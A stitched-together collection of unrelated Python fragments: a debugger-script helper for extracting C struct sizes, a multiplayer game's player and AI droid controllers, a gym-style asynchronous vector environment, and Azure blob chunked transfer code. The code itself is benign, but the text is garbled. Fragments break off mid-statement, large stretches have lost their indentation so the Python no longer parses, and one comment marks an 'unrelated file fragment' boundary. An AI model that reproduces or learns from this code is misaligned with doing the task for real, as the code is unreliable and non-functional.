            # it was unreachable (BaseException catches everything) and
            # has been removed.
            print('An exception occurred: {}'.format(error))
            if ENABLE_DEBUG_ENTER:
                quit(17)
    except BaseException as error:
        print('An exception occurred: {}'.format(error))
        if ENABLE_DEBUG_ENTER:
            quit(18)
def getAllStructSizes(self):
    """Write a MULTI script printing ``sizeof()`` for every known struct,
    then execute it, capturing output into ``self.structSizeFile``.
    """
    self.getAllStructNames()
    # Context manager guarantees the script is flushed/closed before MULTI runs.
    with open(self.structSizeMultiCmdFile, 'w+') as multiCmdFile:
        multiCmdFile.write('_LINES = 10000\n')
        for s in self.structNameList:
            multiCmdFile.write('mprintf(\"sizeof(%s)=%%i\\n\",sizeof(%s))\n' % (s, s))
        multiCmdFile.write('quitall\n')  ### Exit multi gracefully
    command = '%s %s -nodisplay -p %s -RO %s' % (
        self.multiExe, self.elfFile, self.structSizeMultiCmdFile, self.structSizeFile)
    self.executeMultiScript(command)
def extractCstructs(self):
"""Performs an extraction of the definitions from GHS."""
self.getAllFwVersionMacros()
# ---- (unrelated file fragment follows; extraction boundary artifact) ----
if self.zoomed:
self.toggleZoom()
self.currentCrosshair = self.entity.components[self.activeWeapon].defaultCrosshair
if self.keyMap["alternate-action"]:
self.keyMap["alternate-action"] = False
if self.entity.special is not None:
self.entity.special.enable()
if self.currentCrosshair == -1:
self.currentCrosshair = self.entity.components[self.activeWeapon].defaultCrosshair
if self.zoomTime != -1:
blend = min(1.0, (engine.clock.time -
self.zoomTime) / self.totalZoomTime)
self.fov = self.currentFov + \
((self.desiredFov - self.currentFov) * blend)
self.cameraOffset = self.currentCameraOffset + \
((self.desiredCameraOffset - self.currentCameraOffset) * blend)
if base.camLens is not None: # If we're a daemon.
base.camLens.setFov(self.fov)
if blend >= 1.0:
self.zoomTime = -1
self.mouse.update()
self.angleX = self.mouse.getX()
self.angleY = self.mouse.getY()
angleX = self.angleX
if self.isPlatformMode:
angleX = 0
move = True
if self.keyMap["left"] and self.keyMap["forward"]:
angleX += (.75 * math.pi)
elif self.keyMap["left"] and self.keyMap["down"]:
angleX += (.25 * math.pi)
elif self.keyMap["right"] and self.keyMap["forward"]:
angleX -= (.75 * math.pi)
elif self.keyMap["right"] and self.keyMap["down"]:
angleX -= (.25 * math.pi)
elif self.keyMap["left"]:
angleX += (math.pi / 2)
elif self.keyMap["right"]:
angleX -= (math.pi / 2)
elif self.keyMap["forward"]:
angleX += math.pi
elif not self.keyMap["down"]:
move = False
angularVel = self.entity.getAngularVelocity()
maxSpeed = self.maxSpeed
torque = self.torque
self.sprinting = self.keyMap["sprint"]
if self.keyMap["sprint"]:
maxSpeed *= 2
torque *= 2
if move:
self.entity.addTorque(Vec3(engine.impulseToForce(
torque * math.cos(angleX)), engine.impulseToForce(-torque * math.sin(angleX)), 0))
if angularVel.length() > maxSpeed:
angularVel.normalize()
self.entity.setAngularVelocity(angularVel * maxSpeed)
else:
self.entity.addTorque(Vec3(engine.impulseToForce(-angularVel.getX() * 20),
engine.impulseToForce(-angularVel.getY() * 20),
engine.impulseToForce(-angularVel.getZ() * 20)))
if self.isPlatformMode:
self.pickRay.setOrigin(Point3(self.entity.getPosition()))
self.pickRay.setDirection(Vec3(0, -1, 0))
else:
camera.setHpr(-math.degrees(self.angleX) + entityGroup.cameraShakeX *
0.5, math.degrees(self.angleY) + entityGroup.cameraShakeY * 0.5, 0)
cameraPos = render.getRelativeVector(camera, self.cameraOffset)
camera.setPos(self.entity.getPosition() + cameraPos)
self.pickRay.setFromLens(base.camNode, 0, 0)
target = None
if engine.clock.time - self.lastTargetCheck > 0.05:
self.lastTargetCheck = engine.clock.time
queue = aiWorld.getRayCollisionQueue(self.pickRayNP)
camDistance = (camera.getPos() - self.entity.getPosition()
).length() + self.entity.radius
for i in range(queue.getNumEntries()):
entry = queue.getEntry(i)
t = entry.getSurfacePoint(render)
targetVector = camera.getPos() - t
if camDistance < targetVector.length():
target = t
break
if target is None:
self.targetPos = camera.getPos() + (render.getRelativeVector(camera,
Vec3(0, 1, 0)) * self.targetDistance)
else:
self.targetPos = target
self.targetDistance = (target - camera.getPos()).length()
origin = camera.getPos()
dir = render.getRelativeVector(camera, Vec3(0, 1, 0))
closestDot = 0.95
self.targetedEnemy = None
for enemy in (
x for x in list(entityGroup.entities.values()) if isinstance(
x, entities.DropPod) or (
(isinstance(
x, entities.Actor) and not x.getTeam().isAlly(
self.entity.getTeam()) and not x.cloaked))):
vector = enemy.getPosition() - origin
vector.normalize()
dot = vector.dot(dir)
if dot > closestDot:
closestDot = dot
self.targetedEnemy = enemy
self.entity.components[self.activeWeapon].zoomed = self.zoomed
if self.keyMap["fire"]:
if target is not None:
direction = target - self.entity.getPosition()
else:
direction = render.getRelativeVector(
self.pickRayNP, self.pickRay.getDirection())
direction = (camera.getPos() + (direction * 500)
) - self.entity.getPosition()
direction.normalize()
self.entity.components[self.activeWeapon].fire()
if self.entity.components[self.activeWeapon].reloadActive and self.zoomed:
self.toggleZoom() # Zoom out if the weapon reloaded automatically
p = DroidController.serverUpdate(
self, aiWorld, entityGroup, packetUpdate)
# Update camera position if it's been updated by
# DroidController.serverUpdate. That way the screen doesn't jitter.
if not self.isPlatformMode:
camera.setPos(self.entity.getPosition() + cameraPos)
p.add(net.Boolean(self.sprinting))
cmds = len(self.commands)
p.add(net.Uint8(cmds))
if cmds > 0:
self.addCriticalPacket(p, packetUpdate)
for c in self.commands:
p.add(net.Uint8(c[0])) # The ID of our actor
p.add(net.Boolean(c[1] == -1)) # True if this is a special attack
if c[1] != -1: # Setting the bot's target
p.add(net.Uint8(c[1])) # The ID of the target entity
del self.commands[:]
return p
def clientUpdate(self, aiWorld, entityGroup, iterator=None):
    """Apply a server update packet on the client and refresh visuals.

    The read order must mirror the packet layout written by serverUpdate:
    sprint flag, command count, then per-command (actor id, special flag,
    optional target id). Every field must be consumed even when ignored,
    otherwise the iterator desynchronizes for subsequent reads.
    """
    DroidController.clientUpdate(self, aiWorld, entityGroup, iterator)
    if iterator is not None:
        self.sprinting = net.Boolean.getFrom(iterator)
        cmds = net.Uint8.getFrom(iterator)
        for i in range(cmds):
            id = net.Uint8.getFrom(iterator)
            entity = entityGroup.getEntity(id)
            if entity is None:
                # Unknown actor on this client: still consume the fields to
                # keep the iterator aligned. BUGFIX: serverUpdate writes a
                # target byte only when the special flag is False, but the
                # original consumed it when the flag was True.
                if not net.Boolean.getFrom(iterator):
                    net.Uint8.getFrom(iterator)
            else:
                controller = entity.controller
                if net.Boolean.getFrom(iterator):
                    controller.enableSpecial()
                else:
                    target = entityGroup.getEntity(
                        net.Uint8.getFrom(iterator))
                    # Targeting ourselves means "clear the bot's target".
                    if target == self.entity:
                        controller.setTarget(None)
                    else:
                        controller.setTarget(target)
    # Per-frame visuals (independent of whether a packet arrived).
    particles.UnitHighlightParticleGroup.draw(self.entity.getPosition(
    ), self.entity.getTeam().color, self.entity.radius + 0.4)
    weapon = self.entity.components[self.activeWeapon]
    if weapon.selected and self.sprinting:
        weapon.hide()
    # If the melee claw isn't ready
    if not self.entity.components[0].isReady():
        weapon.hide()
    elif not weapon.selected and not self.sprinting:
        weapon.show()
def delete(self, killed=False):
    """Tear down this controller, restoring the default camera FOV for a
    local, non-daemon player before delegating to DroidController.delete."""
    restoreFov = self.entity.isLocal and base.camLens is not None
    if restoreFov:
        base.camLens.setFov(self.defaultFov)
    DroidController.delete(self, killed)
class AIController(DroidController):
"""The AIController uses the ai module's pathfinding algorithms to go places.
At the moment, only BasicDroid actors are supported."""
def __init__(self):
    """Initialize pathfinding, targeting and dodging state for an AI droid."""
    DroidController.__init__(self)
    # Targeting state
    self.nearestEnemy = None
    self.targetedEnemy = None
    self.enemyLastVisible = False
    # Pathfinding state
    self.moving = False
    self.path = ai.Path()
    self.lastAiNode = None
    self.lastTargetAiNode = None
    # Stagger the periodic timers with a random offset so all droids don't
    # recompute paths on the same frame.
    self.lastPathFind = engine.clock.time + random() + 1.0
    self.lastMovementUpdate = engine.clock.time + random() + 1.0
    self.direction = Vec3()
    # Combat timers
    self.lastShot = 0
    self.lastTargetCheck = 0
    # Obstacle-dodging state
    self.lastDodgeDirectionChange = 0
    self.reverseDodgeDirection = False
def buildSpawnPacket(self):
    """Extend the base droid spawn packet with this AI's team index."""
    packet = DroidController.buildSpawnPacket(self)
    packet.add(net.Uint8(self.entity.teamIndex))
    return packet
@staticmethod
def readSpawnPacket(aiWorld, entityGroup, iterator, entity=None):
    """Construct a remote (non-local) BasicDroid from a spawn packet.

    NOTE(review): the ``entity`` parameter is immediately overwritten and
    therefore ignored here; it appears to be kept only for signature
    compatibility with the other readSpawnPacket implementations --
    confirm no caller relies on passing a pre-built entity.
    """
    entity = entities.BasicDroid(
        aiWorld.world, aiWorld.space, AIController(), local=False)
    entity = DroidController.readSpawnPacket(
        aiWorld, entityGroup, iterator, entity)
    entity.teamIndex = net.Uint8.getFrom(iterator)
    return entity
def actorDamaged(self, entity, damage, ranged):
    """React to one of our actors taking damage.

    NOTE(review): the guard below currently has no effect -- the method
    body ends immediately after it. It reads like retaliation logic that
    used to follow was removed; confirm before cleaning up the check.
    """
    DroidController.actorDamaged(self, entity, damage, ranged)
    if not isinstance(entity, entities.BasicDroid) or entity.cloaked:
        return
def enableSpecial(self):
    """Trigger this droid's special ability, if it has one."""
    special = self.entity.special
    if special is not None:
        special.enable()
def setTarget(self, target):
    # Commanded target (e.g. set by the player); consulted by serverUpdate.
    self.targetedEnemy = target
def pathCallback(self, path):
    # Receives the asynchronously computed path from ai.requestPath.
    self.path = path
def serverUpdate(self, aiWorld, entityGroup, packetUpdate):
# PATH FIND UPDATE
if engine.clock.time - self.lastPathFind > 1.0:
self.lastPathFind = engine.clock.time
player = self.entity.getTeam().getPlayer()
if player is None and (
self.targetedEnemy is None or not self.targetedEnemy.active):
self.targetedEnemy = aiWorld.getNearestDropPod(
entityGroup, self.entity.getPosition())
if self.targetedEnemy is None:
self.targetedEnemy = aiWorld.getNearestEnemy(
entityGroup, self.entity.getPosition(), self.entity.getTeam())
if self.targetedEnemy is not None and self.targetedEnemy.active and isinstance(
self.targetedEnemy, entities.Actor):
self.nearestEnemy = self.targetedEnemy
elif self.nearestEnemy is None or not self.nearestEnemy.active or (self.nearestEnemy.getPosition() - self.entity.getPosition()).length() > 15:
self.nearestEnemy = aiWorld.getNearestEnemy(
entityGroup, self.entity.getPosition(), self.entity.getTeam())
aiNode = aiWorld.navMesh.getNode(
self.entity.getPosition(), self.entity.radius, self.lastAiNode)
targetAiNode = None
target = None
if self.targetedEnemy is not None and self.targetedEnemy.active:
target = self.targetedEnemy
elif self.entity.getTeam().getPlayer() is not None and self.entity.getTeam().getPlayer().active:
target = self.entity.getTeam().getPlayer()
if target is not None:
targetAiNode = aiWorld.navMesh.getNode(
target.getPosition(), target.radius)
if (target.getPosition() -
self.entity.getPosition()).length() > 10:
if (
targetAiNode is not None and aiNode is not None) and (
targetAiNode != self.lastTargetAiNode or (
aiNode != self.lastAiNode and (
aiNode not in self.path.nodes))):
ai.requestPath(
self.pathCallback,
aiNode,
targetAiNode,
self.entity.getPosition(),
target.getPosition(),
self.entity.radius + 0.5)
else:
self.path.clear()
self.path.end = target.getPosition() + Vec3(uniform(-12, 12), uniform(-12, 12), 0)
self.lastAiNode = aiNode
self.lastTargetAiNode = targetAiNode
# PATH FIND TO NEXT NODE
if engine.clock.time - self.lastMovementUpdate > 0.2:
self.lastMovementUpdate = engine.clock.time
self.moving = False
self.direction = Vec3()
if self.path is not None and self.path.hasNext():
self.moving = True
self.direction = self.path.current() - self.entity.getPosition()
if self.direction.length() < self.entity.radius + 2:
next(self.path)
self.direction.normalize()
elif self.path is not None and self.path.end is not None and (self.path.end - self.entity.getPosition()).length() > 4:
self.direction = self.path.end - self.entity.getPosition()
self.direction.normalize()
self.moving = True
# Simple obstacle avoidance
obj = entityGroup.getNearestPhysicsEntity(
self.entity.getPosition())
if obj is not None:
diff = obj.getPosition() - self.entity.getPosition()
if diff.length() < obj.radius + self.entity.radius + 1.5:
diff.setZ(0)
diff.normalize()
if self.direction.dot(diff) > 0.7:
up = Vec3(0, 0, 1)
self.direction = diff.cross(up)
if engine.clock.time - self.lastDodgeDirectionChange > 1.0:
self.lastDodgeDirectionChange = engine.clock.time
self.reverseDodgeDirection = random() > 0.5
if self.reverseDodgeDirection:
self.direction *= -1
# PHYSICS/MOVEMENT UPDATE
angularVel = self.entity.getAngularVelocity()
if self.moving:
self.entity.addTorque(
Vec3(
engine.impulseToForce(
-self.torque * self.direction.getY()),
engine.impulseToForce(
self.torque * self.direction.getX()),
0))
if angularVel.length() > self.maxSpeed:
angularVel.normalize()
self.entity.setAngularVelocity(angularVel * self.maxSpeed)
else:
self.entity.addTorque(Vec3(engine.impulseToForce(-angularVel.getX() * 6),
engine.impulseToForce(-angularVel.getY() * 6),
engine.impulseToForce(-angularVel.getZ() * 6)))
# WEAPON UPDATE
weapon = self.entity.components[self.activeWeapon]
if weapon.burstTimer == -1 and engine.clock.time - \
weapon.burstDelayTimer >= weapon.burstDelay:
if self.nearestEnemy is not None and self.nearestEnemy.active:
vector = self.nearestEnemy.getPosition() - self.entity.getPosition()
if vector.length() < weapon.range:
vector.normalize()
if engine.clock.time - self.lastTargetCheck > 1.0:
self.lastTargetCheck = engine.clock.time
self.enemyLastVisible = entityGroup.getEntityFromEntry(aiWorld.getFirstCollision(
self.entity.getPosition() + (vector * (self.entity.radius + 0.2)), vector)) == self.nearestEnemy
if self.enemyLastVisible:
weapon.burstTimer = engine.clock.time
weapon.burstDelayTimer = -1
weapon.burstTime = weapon.burstTimeBase * \
((random() * 1.5) + 1)
weapon.shotDelay = weapon.shotDelayBase * \
((random() * 1.5) + 1)
if weapon.burstTimer != -1 and engine.clock.time - \
weapon.burstTimer <= weapon.burstTime and self.nearestEnemy is not None and self.nearestEnemy.active:
if engine.clock.time - self.lastShot > weapon.shotDelay:
if weapon.fire():
weapon.burstDelayTimer = engine.clock.time
weapon.burstDelay = weapon.burstDelayBase * \
((random() * 1.5) + 1)
self.lastShot = engine.clock.time
else:
weapon.burstTimer = -1
if self.nearestEnemy is not None and self.nearestEnemy.active:
self.targetPos = self.nearestEnemy.getPosition()
if weapon.firing:
vector = self.targetPos - self.entity.getPosition()
distance = vector.length()
vector /= distance
coefficient = uniform(weapon.accuracy - 1.0,
1.0 - weapon.accuracy) * 2.0
up = Vec3(0, 0, 1)
cross = vector.cross(up)
self.targetPos += up * coefficient
self.targetPos += cross * coefficient
p = DroidController.serverUpdate(
self, aiWorld, entityGroup, | |
# reinforcement_learning/gym/vector/async_vector_env.py
import numpy as np
import multiprocessing as mp
import time
import sys
from enum import Enum
from copy import deepcopy
from reinforcement_learning.gym import logger
from reinforcement_learning.gym.vector.vector_env import VectorEnv
from reinforcement_learning.gym.error import (AlreadyPendingCallError, NoAsyncCallError,
ClosedEnvironmentError)
from reinforcement_learning.gym.vector.utils import (create_shared_memory, create_empty_array,
write_to_shared_memory, read_from_shared_memory,
concatenate, CloudpickleWrapper, clear_mpi_env_vars)
__all__ = ['AsyncVectorEnv']
class AsyncState(Enum):
    """Lifecycle states of the AsyncVectorEnv request/response protocol."""
    DEFAULT = 'default'        # No asynchronous call pending.
    WAITING_RESET = 'reset'    # reset_async sent; awaiting reset_wait.
    WAITING_STEP = 'step'      # step_async sent; awaiting step_wait.
class AsyncVectorEnv(VectorEnv):
"""Vectorized environment that runs multiple environments in parallel. It
uses `multiprocessing` processes, and pipes for communication.
Parameters
----------
env_fns : iterable of callable
Functions that create the environments.
observation_space : `gym.spaces.Space` instance, optional
Observation space of a single environment. If `None`, then the
observation space of the first environment is taken.
action_space : `gym.spaces.Space` instance, optional
Action space of a single environment. If `None`, then the action space
of the first environment is taken.
shared_memory : bool (default: `True`)
If `True`, then the observations from the worker processes are
communicated back through shared variables. This can improve the
efficiency if the observations are large (e.g. images).
copy : bool (default: `True`)
If `True`, then the `reset` and `step` methods return a copy of the
observations.
context : str, optional
Context for multiprocessing. If `None`, then the default context is used.
Only available in Python 3.
daemon : bool (default: `True`)
If `True`, then subprocesses have `daemon` flag turned on; that is, they
will quit if the head process quits. However, `daemon=True` prevents
subprocesses to spawn children, so for some environments you may want
to have it set to `False`
worker : function, optional
WARNING - advanced mode option! If set, then use that worker in a subprocess
instead of a default one. Can be useful to override some inner vector env
logic, for instance, how resets on done are handled. Provides high
degree of flexibility and a high chance to shoot yourself in the foot; thus,
if you are writing your own worker, it is recommended to start from the code
for `_worker` (or `_worker_shared_memory`) method below, and add changes
"""
def __init__(self, env_fns, observation_space=None, action_space=None,
shared_memory=True, copy=True, context=None, daemon=True, worker=None):
try:
ctx = mp.get_context(context)
except AttributeError:
logger.warn('Context switching for `multiprocessing` is not '
'available in Python 2. Using the default context.')
ctx = mp
self.env_fns = env_fns
self.shared_memory = shared_memory
self.copy = copy
if (observation_space is None) or (action_space is None):
dummy_env = env_fns[0]()
observation_space = observation_space or dummy_env.observation_space
action_space = action_space or dummy_env.action_space
dummy_env.close()
del dummy_env
super(AsyncVectorEnv, self).__init__(num_envs=len(env_fns),
observation_space=observation_space, action_space=action_space)
if self.shared_memory:
_obs_buffer = create_shared_memory(self.single_observation_space,
n=self.num_envs, ctx=ctx)
self.observations = read_from_shared_memory(_obs_buffer,
self.single_observation_space, n=self.num_envs)
else:
_obs_buffer = None
self.observations = create_empty_array(
self.single_observation_space, n=self.num_envs, fn=np.zeros)
self.parent_pipes, self.processes = [], []
self.error_queue = ctx.Queue()
target = _worker_shared_memory if self.shared_memory else _worker
target = worker or target
with clear_mpi_env_vars():
for idx, env_fn in enumerate(self.env_fns):
parent_pipe, child_pipe = ctx.Pipe()
process = ctx.Process(target=target,
name='Worker<{0}>-{1}'.format(type(self).__name__, idx),
args=(idx, CloudpickleWrapper(env_fn), child_pipe,
parent_pipe, _obs_buffer, self.error_queue))
self.parent_pipes.append(parent_pipe)
self.processes.append(process)
process.daemon = daemon
process.start()
child_pipe.close()
self._state = AsyncState.DEFAULT
self._check_observation_spaces()
def seed(self, seeds=None):
self._assert_is_running()
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
if isinstance(seeds, int):
seeds = [seeds + i for i in range(self.num_envs)]
assert len(seeds) == self.num_envs
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `seed` while waiting '
'for a pending call to `{0}` to complete.'.format(
self._state.value), self._state.value)
for pipe, seed in zip(self.parent_pipes, seeds):
pipe.send(('seed', seed))
_, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
def reset_async(self):
self._assert_is_running()
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `reset_async` while waiting '
'for a pending call to `{0}` to complete'.format(
self._state.value), self._state.value)
for pipe in self.parent_pipes:
pipe.send(('reset', None))
self._state = AsyncState.WAITING_RESET
def reset_wait(self, timeout=None):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `reset_wait` times out. If
`None`, the call to `reset_wait` never times out.
Returns
-------
observations : sample from `observation_space`
A batch of observations from the vectorized environment.
"""
self._assert_is_running()
if self._state != AsyncState.WAITING_RESET:
raise NoAsyncCallError('Calling `reset_wait` without any prior '
'call to `reset_async`.', AsyncState.WAITING_RESET.value)
if not self._poll(timeout):
self._state = AsyncState.DEFAULT
raise mp.TimeoutError('The call to `reset_wait` has timed out after '
'{0} second{1}.'.format(timeout, 's' if timeout > 1 else ''))
results, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
self._state = AsyncState.DEFAULT
if not self.shared_memory:
concatenate(results, self.observations, self.single_observation_space)
return deepcopy(self.observations) if self.copy else self.observations
def step_async(self, actions):
"""
Parameters
----------
actions : iterable of samples from `action_space`
List of actions.
"""
self._assert_is_running()
if self._state != AsyncState.DEFAULT:
raise AlreadyPendingCallError('Calling `step_async` while waiting '
'for a pending call to `{0}` to complete.'.format(
self._state.value), self._state.value)
for pipe, action in zip(self.parent_pipes, actions):
pipe.send(('step', action))
self._state = AsyncState.WAITING_STEP
def step_wait(self, timeout=None):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `step_wait` times out. If
`None`, the call to `step_wait` never times out.
Returns
-------
observations : sample from `observation_space`
A batch of observations from the vectorized environment.
rewards : `np.ndarray` instance (dtype `np.float_`)
A vector of rewards from the vectorized environment.
dones : `np.ndarray` instance (dtype `np.bool_`)
A vector whose entries indicate whether the episode has ended.
infos : list of dict
A list of auxiliary diagnostic informations.
"""
self._assert_is_running()
if self._state != AsyncState.WAITING_STEP:
raise NoAsyncCallError('Calling `step_wait` without any prior call '
'to `step_async`.', AsyncState.WAITING_STEP.value)
if not self._poll(timeout):
self._state = AsyncState.DEFAULT
raise mp.TimeoutError('The call to `step_wait` has timed out after '
'{0} second{1}.'.format(timeout, 's' if timeout > 1 else ''))
results, successes = zip(*[pipe.recv() for pipe in self.parent_pipes])
self._raise_if_errors(successes)
self._state = AsyncState.DEFAULT
observations_list, rewards, dones, infos = zip(*results)
if not self.shared_memory:
concatenate(observations_list, self.observations,
self.single_observation_space)
return (deepcopy(self.observations) if self.copy else self.observations,
np.array(rewards), np.array(dones, dtype=np.bool_), infos)
def close_extras(self, timeout=None, terminate=False):
"""
Parameters
----------
timeout : int or float, optional
Number of seconds before the call to `close` times out. If `None`,
the call to `close` never times out. If the call to `close` times
out, then all processes are terminated.
terminate : bool (default: `False`)
If `True`, then the `close` operation is forced and all processes
are terminated.
"""
timeout = 0 if terminate else timeout
try:
if self._state != AsyncState.DEFAULT:
logger.warn('Calling `close` while waiting for a pending '
'call to `{0}` to complete.'.format(self._state.value))
function = getattr(self, '{0}_wait'.format(self._state.value))
function(timeout)
except mp.TimeoutError:
terminate = True
if terminate:
for process in self.processes:
if process.is_alive():
process.terminate()
else:
for pipe in self.parent_pipes:
if (pipe is not None) and (not pipe.closed):
pipe.send(('close', None))
for pipe in self.parent_pipes:
if (pipe is not None) and (not pipe.closed):
pipe.recv()
for pipe in self.parent_pipes:
if pipe is not None:
pipe.close()
for process in self.processes:
process.join()
def _poll(self, timeout=None):
self._assert_is_running()
if timeout is None:
return True
end_time = time.time() + timeout
delta = None
for pipe in self.parent_pipes:
delta = max(end_time - time.time(), 0)
if pipe is None:
return False
if pipe.closed or (not pipe.poll(delta)):
return False
return True
def _check_observation_spaces(self):
    """Verify that every worker's observation space equals
    `single_observation_space`; raise RuntimeError otherwise."""
    self._assert_is_running()
    space = self.single_observation_space
    for pipe in self.parent_pipes:
        pipe.send(('_check_observation_space', space))
    replies = [pipe.recv() for pipe in self.parent_pipes]
    same_spaces, successes = zip(*replies)
    self._raise_if_errors(successes)
    if not all(same_spaces):
        raise RuntimeError('Some environments have an observation space '
            'different from `{0}`. In order to batch observations, the '
            'observation spaces from all environments must be '
            'equal.'.format(self.single_observation_space))
def _assert_is_running(self):
    """Guard: fail fast if `close()` has already been called."""
    if not self.closed:
        return
    raise ClosedEnvironmentError('Trying to operate on `{0}`, after a '
        'call to `close()`.'.format(type(self).__name__))
def _raise_if_errors(self, successes):
    """Surface worker failures: log every queued error, disable the failed
    worker's pipe, then re-raise the last exception in the parent."""
    if all(successes):
        return
    num_errors = self.num_envs - sum(successes)
    assert num_errors > 0
    remaining = num_errors
    while remaining > 0:
        index, exctype, value = self.error_queue.get()
        logger.error('Received the following error from Worker-{0}: '
            '{1}: {2}'.format(index, exctype.__name__, value))
        logger.error('Shutting down Worker-{0}.'.format(index))
        # Mark the worker's pipe unusable so later operations skip it.
        self.parent_pipes[index].close()
        self.parent_pipes[index] = None
        remaining -= 1
    logger.error('Raising the last exception back to the main process.')
    raise exctype(value)
def _worker(index, env_fn, pipe, parent_pipe, shared_memory, error_queue):
assert shared_memory is None
env = env_fn()
parent_pipe.close()
try:
while True:
command, data = pipe.recv()
if command == 'reset':
observation = env.reset()
pipe.send((observation, True))
elif command == 'step':
observation, reward, done, info = env.step(data)
if done:
observation = env.reset()
pipe.send(((observation, reward, done, info), True))
elif command == 'seed':
env.seed(data)
pipe.send((None, True))
elif command == 'close':
pipe.send((None, True))
break
elif command == '_check_observation_space':
pipe.send((data == env.observation_space, True))
else:
raise RuntimeError('Received unknown command `{0}`. Must '
'be | |
blobdict
def generate_xferspec_download(
        blob_service, args, storage_in_queue, localfile, remoteresource,
        contentlength, contentmd5, addfd):
    """Generate an xferspec for download
    Parameters:
        blob_service - blob service
        args - program arguments
        storage_in_queue - storage input queue
        localfile - name of local resource
        remoteresource - name of remote resource
        contentlength - content length
        contentmd5 - content md5
        addfd - create and add file handle
    Returns:
        xferspec containing instructions
    Raises:
        ValueError if get_blob_properties returns an invalid result or
        contentlength is invalid
    """
    # get the file metadata when the caller did not already supply it
    if contentlength is None or contentmd5 is None:
        result = azure_request(
            blob_service.get_blob_properties, timeout=args.timeout,
            container_name=args.container, blob_name=remoteresource)
        if not result:
            raise ValueError(
                'unexpected result for get_blob_properties is None')
        if 'content-md5' in result:
            contentmd5 = result['content-md5']
        # NOTE: `long` / `xrange` below -- this module targets Python 2
        contentlength = long(result['content-length'])
    if contentlength < 0:
        raise ValueError(
            'contentlength is invalid for {}'.format(remoteresource))
    print('remote file {} length: {} bytes, md5: {}'.format(
        remoteresource, contentlength, contentmd5))
    # skip the download entirely when the local file already matches the
    # remote md5 (returns an all-None sentinel the caller checks for)
    if args.skiponmatch and contentmd5 is not None and \
            os.path.exists(localfile):
        lmd5 = compute_md5_for_file_asbase64(localfile)
        print('{}: local {} remote {} ->'.format(
            localfile, lmd5, contentmd5), end='')
        if lmd5 != contentmd5:
            print('MISMATCH, re-downloading')
        else:
            print('match, skipping download')
            return None, None, None, None
    # download into a side temp file; presumably the caller renames it to
    # `localfile` after the transfer completes -- TODO confirm
    tmpfilename = localfile + '.blobtmp'
    nchunks = contentlength // args.chunksizebytes
    currfileoffset = 0
    nstorageops = 0
    flock = threading.Lock()
    filedesc = None
    # preallocate file
    # (seek+write of a single byte forces the file to its final size so
    # that concurrent chunk writers can seek anywhere within it)
    with flock:
        filedesc = open(tmpfilename, 'wb')
        if contentlength > 0:
            filedesc.seek(contentlength - 1)
            filedesc.write(b'\0')
        filedesc.close()
        if addfd:
            # reopen under r+b mode
            filedesc = open(tmpfilename, 'r+b')
        else:
            filedesc = None
    # enqueue one storage operation per chunk
    for _ in xrange(nchunks + 1):
        chunktoadd = min(args.chunksizebytes, contentlength)
        if chunktoadd + currfileoffset > contentlength:
            chunktoadd = contentlength - currfileoffset
        # on download, chunktoadd must be offset by 1 as the x-ms-range
        # header expects it that way. x -> y bytes means first bits of the
        # (x+1)th byte to the last bits of the (y+1)th byte. for example,
        # 0 -> 511 means byte 1 to byte 512
        xferspec = [tmpfilename, args.container, remoteresource, None,
                    currfileoffset, chunktoadd - 1, flock, filedesc]
        currfileoffset = currfileoffset + chunktoadd
        nstorageops = nstorageops + 1
        storage_in_queue.put(xferspec)
        if currfileoffset >= contentlength:
            break
    return contentlength, nstorageops, contentmd5, filedesc
def generate_xferspec_upload(
        args, storage_in_queue, blobskipdict, blockids, localfile,
        remoteresource, addfd):
    """Generate an xferspec for upload
    Parameters:
        args - program arguments
        storage_in_queue - storage input queue
        blobskipdict - blob skip dictionary
        blockids - block id dictionary
        localfile - name of local resource
        remoteresource - name of remote resource
        addfd - create and add file handle
    Returns:
        xferspec containing instructions
    Raises:
        Nothing
    """
    # compute md5 hash
    md5digest = None
    if args.computefilemd5:
        # second argument flags page-blob mode; presumably the digest is
        # computed differently for page blobs -- confirm in the helper
        md5digest = compute_md5_for_file_asbase64(
            localfile, as_page_blob(args.pageblob, args.autovhd, localfile))
        print('{} md5: {}'.format(localfile, md5digest))
    # skip the upload when the remote blob already matches the local md5
    if args.skiponmatch and remoteresource in blobskipdict:
        print('{}->{}: local {} remote {} ->'.format(
            localfile, remoteresource, md5digest,
            blobskipdict[remoteresource][1]), end='')
        if md5digest != blobskipdict[remoteresource][1]:
            print('MISMATCH, re-uploading')
        else:
            print('match, skipping upload')
            return None, 0, None, None
    # create blockids entry
    if localfile not in blockids:
        blockids[localfile] = []
    # partition local file into chunks
    filesize = os.path.getsize(localfile)
    nchunks = filesize // args.chunksizebytes
    currfileoffset = 0
    nstorageops = 0
    flock = threading.Lock()
    filedesc = None
    if addfd:
        with flock:
            filedesc = open(localfile, 'rb')
    # NOTE: `xrange` -- this module targets Python 2
    for _ in xrange(nchunks + 1):
        chunktoadd = min(args.chunksizebytes, filesize)
        if chunktoadd + currfileoffset > filesize:
            chunktoadd = filesize - currfileoffset
        # block id = zero-padded chunk index; presumably padded so all ids
        # of a blob share the same length as the service requires -- confirm
        blockid = '{0:08d}'.format(currfileoffset // args.chunksizebytes)
        blockids[localfile].append(blockid)
        xferspec = [localfile, args.container, remoteresource, blockid,
                    currfileoffset, chunktoadd, flock, filedesc]
        currfileoffset = currfileoffset + chunktoadd
        nstorageops = nstorageops + 1
        storage_in_queue.put(xferspec)
        if currfileoffset >= filesize:
            break
    return filesize, nstorageops, md5digest, filedesc
def apply_file_collation(args, fname, apply_keeproot=False):
    """Map a local file name onto its remote (optionally collated) name.

    Parameters:
        args - arguments (reads `keeprootdir` and `collate`)
        fname - file name
        apply_keeproot - apply keep rootdir transformation
    Returns:
        remote filename
    Raises:
        No special exception handling
    """
    sep = os.path.sep
    remote = fname.strip(sep)
    # Optionally drop the leading path component.
    if apply_keeproot and not args.keeprootdir:
        parts = remote.split(sep)
        if len(parts) > 1:
            remote = sep.join(parts[1:])
    # Collation flattens to the basename and re-roots it under the
    # collation directory ('.' means the container root itself).
    if args.collate is not None:
        remote = remote.split(sep)[-1]
        if args.collate != '.':
            remote = sep.join((args.collate, remote))
    return remote
def main():
"""Main function
